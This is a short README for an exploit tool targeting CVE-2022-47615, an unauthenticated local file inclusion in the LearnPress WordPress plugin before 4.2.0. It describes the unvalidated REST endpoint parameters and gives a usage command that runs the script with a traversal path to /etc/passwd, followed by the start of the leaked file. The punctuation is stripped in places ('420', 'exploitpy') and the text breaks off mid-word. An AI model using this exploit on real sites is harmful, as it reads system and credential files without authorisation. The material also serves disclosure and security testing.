LearnPress Plugin < 4.2.0 - Unauthenticated LFI Description
CVE-2022-47615 LearnPress Plugin < 420 - Unauthenticated LFI Description Description The plugin does not validate various parameters in the lp/v1/courses/archive-course REST endpoints before using them in include statement, which could lead to LFI issues How to use $ python3 exploitpy -u wordpresslan -f ///etc/passwd root:x:0:0:root:/root:/bin/bash daem